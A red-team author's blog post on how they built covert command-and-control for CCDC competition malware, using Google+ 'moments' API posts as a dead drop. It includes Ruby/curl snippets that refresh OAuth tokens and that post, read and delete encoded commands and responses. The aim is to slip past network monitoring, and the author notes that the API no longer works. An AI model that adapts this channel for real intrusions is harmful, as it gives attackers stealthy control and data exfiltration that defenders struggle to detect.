Over the past few years, I have been organizing, participating in, and frequently writing attack software for CCDC red teams. This year, as I've been starting to dust off the code, spin up VM's and test things to see if they still work, I have noticed that my last-ditch covert channel for control and data exfiltration no longer works.
This method was one of my favorites, and to my knowledge was never found by the blue teams. Prior to the regional competitions last year, a reward was offered at SAHA to any blue team who could find it but was never claimed.
Creating command and control (C2) methods for malware to function in a closely monitored network is an interesting problem with innumerable solutions; the only rule is that commands must be sent to and data must be received from the compromised systems. The most convenient way for this to work is via a listening service, like Windows' built-in WMI service or the various *nix's SSH. But these tend to get blocked quickly and easily by host and network firewalls, as block inbound traffic is the default policy and open ports are easily identified.
So most red team malware follows a callback strategy, periodically connecting out to the controller. You can easily use any port with existing backdoors, and if you take the time to develop an appropriate backdoor and controller, you can use any protocol imaginable. But direct connections can be trouble, since once the blue team finds a connection to your IP that looks suspicious, they can block you. Or they can look for your IP address and quickly shut down anything communicating with it. Using many different IP addresses can help, but conscientious blue teams analyzing network traffic may still find connections heading to an unknown destination and shut down or clean infected systems. Blue teams may also use outbound firewalls to block this traffic. Some services would have to be allowed in or out, but there was no way we would know what those would be until we showed up for the competition.
More advanced solutions, rather than establishing a connection straight in or out, use a legitimate third party service you can both send data to and read data from as a dead drop site. Dead drop style C2 is more complex, since you must encode and encapsulate your data to fit the medium; there is normally no inherent direction of data flow, just posted or not. Data blobs will almost certainly be read multiple times, out of order, and by every client that is using this C2 method. As a result, you must largely implement your own addressing, sequencing and tagging, and de-duplication for this to be more than a toy proof of concept. If you use dead drop C2 for more serious hacking, you must also implement encryption and authentication to avoid having your C2 method co-opted by the third party.
As far as I could tell, there was only one thing that you could guarantee would never be blocked; one thing no blue team could ever do without. And that was Google. Although I can't see anything sent to www.google.com; the way Google set up its servers, they act as a front end gateway for most Google services. So most of the time, www.google.com would resolve to the same IP range or even same IP as plus.google.com, accounts.google.com, www.googleapis.com, etc. And Google did offer an API for Google+. And this API did include the ability to both post text data ("moments") and read that posted data, fulfilling all the requirements of a good dead drop.
Using Google+ API as a dead-drop-style C2 method required a number of steps:
1. Create a burner account so if someone finds your malware and extracts the authentication tokens from it, they cannot take over any account you care about.
2. Go to the Google Developers Console and create a project (this part can be done by any Google account). Then use the Web UI to enable access to the Google+ API. Google provides a variety of OAuth 2.0 mechanisms for different usage patterns. Since we are interested in the simplest way forward so we can hide and automate the process as much as possible, we go to credentials and create an "Other" type OAuth client ID and secret (and save these).
3. Set up an OAuth 2 Google URL with your client ID that will be used to prompt the user account for access. For a normal application, this is the URL all users would go to to grant your application access. The URL query parameters indicate the type of Google API access that the application requires, which for Google+ was "https://www.googleapis.com/auth/plus.login profile". For my application, the complete URL looked like this: https://accounts.google.com/o/oauth2/auth?scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fplus.login%20profile&redirect_uri=urn:ietf:wg:oauth:2.0:oob&response_type=code&client_id=
4. Signed in under the burner account, go to the URL set up in step 3. You will be prompted to grant the application access to perform certain actions on behalf of your account. When you click to allow it, it will return an authorization code.
5. You will then send the authorization code, your client ID, and your client secret to Google in an API submission and get an access token and a refresh token. I just created this HTML form in a text editor, saved it, opened it in a browser and clicked to submit it:
<form action="https://accounts.google.com/o/oauth2/token" method="POST" enctype="application/x-www-form-urlencoded"> code: <input type="text" name="code" size="100" value="THIS IS WHERE YOU PUT YOUR AUTH CODE"><br> client_id: <input type="text" name="client_id" size="100" value="<REDACTED>.apps.googleusercontent.com"><br> client_secret: <input type="text" name="client_secret" size="100" value="<REDACTED>"><br> redirect_uri: <input type="text" name="redirect_uri" size="100" value="urn:ietf:wg:oauth:2.0:oob"><br> grant_type: <input type="text" name="grant_type" size="100" value="authorization_code"><br> <input type="submit" value="Submit"> </form>
Save the refresh token you get back. The access token is only good for an hour, so it's not as important to save. Your initial setup is complete and should not need to be re-created again.
6. Now you need to write the code that will take the refresh token (which won't change), client ID, and client secret and submit them to get an access token. This will need to happen about once every hour you use this C2 method, so it needs to be automated. For my controller, I just used a curl command in a few lines of ruby to do this:
require 'json' curlresp = `curl https://accounts.google.com/o/oauth2/token -d 'grant_type=refresh_token&refresh_token=<REDACTED>&client_id=<REDACTED>.apps.googleusercontent.com&client_secret=<REDACTED>'` parsed = JSON.parse(curlresp) authcode = parsed['access_token']
Your malware also needs to be able to do this automatically, because on day 2, your callback still needs to work, but any access tokens you gave it on day 1 won't work anymore. Once you have your access token, you can begin to make queries to the API using that access token to authenticate.
7. Now that authentication is out of the way, remember what I said earlier about de-duplication, addressing, and tagging? Now is when you really need to have figured that out. This is the non-exciting software engineering side to hacking, but it is very important. Otherwise every infected system is going to execute every command ever sent every time it calls back, which is a bad thing. You can identify systems by system name, IP address, motherboard GUID, product ID, MAC addresses, or other system properties. Or you can create your own ID on the controller and issue it to each client as it comes in (best for uniqueness, but requires saving state). System name and IP addresses can change, which may be a good or bad thing, because you'll see when they change, but it's hard to correlate back to previous callbacks.
In my case, I generated a random ID (randid) for each message with a different tag for commands ("cmd") and responses ("resp") so a client doesn't try to execute its own response, wrote code to immediately delete each message after reading to avoid duplication, used a combination of system name and IP addresses for target identifier, and combined those with the command or response data in a base64 encoded string (postdata) to avoid illegal character and JSON encoding issues. (I slacked off and didn't use a proper JSON encoder for this part). The deletes didn't always take effect right away though, so there was also a timeout before re-polling.
8. With your communications strategy nailed down, the first thing you need to be able to do is to post all that data to the dead drop. For Google+, using the moments insert API was the easiest way to do that; again using a ruby snippet to assemble the JSON object and POST it with the authorization code to the Google API endpoint:
postdata = '{"kind":"plus#moment","type":"http://schema.org/AddAction","object":{"kind":"plus#itemScope","type": "http://schema.org/AddAction","id":"cmd'+randid+'","name":"Cmd '+randid+'","description":"'+desc+'"}}' curlresp = `curl -H "Authorization: Bearer #{authcode}" -H "Content-Type: application/json" -d '#{postdata}' https://www.googleapis.com/plus/v1/people/me/moments/vault`
This moments insert API is no longer functional. Google has disabled it along with all the other API's that can create or modify data, breaking this process, but we'll continue since it's educational.
9. Once that is done, you need a method to pull down the list of posted commands or responses. The moments list API was designed for just that:
curlresp = `curl -H "Authorization: Bearer #{authcode}" https://www.googleapis.com/plus/v1/people/me/moments/vault` parsed = JSON.parse(curlresp) if parsed.include? 'items' parsed['items'].each do |item| target = item['target'] if target['description'].start_with? <REDACTED> #base64 decode and parse the command or result data stored in the description field here
10. Finally, once you have processed a command or response, you need to delete it:
delresp = `curl -H "Authorization: Bearer #{authcode}" -X DELETE https://www.googleapis.com/plus/v1/moments/#{item['id']}`
If you processed a command and have data to send back to the controller, you'll repeat step 8.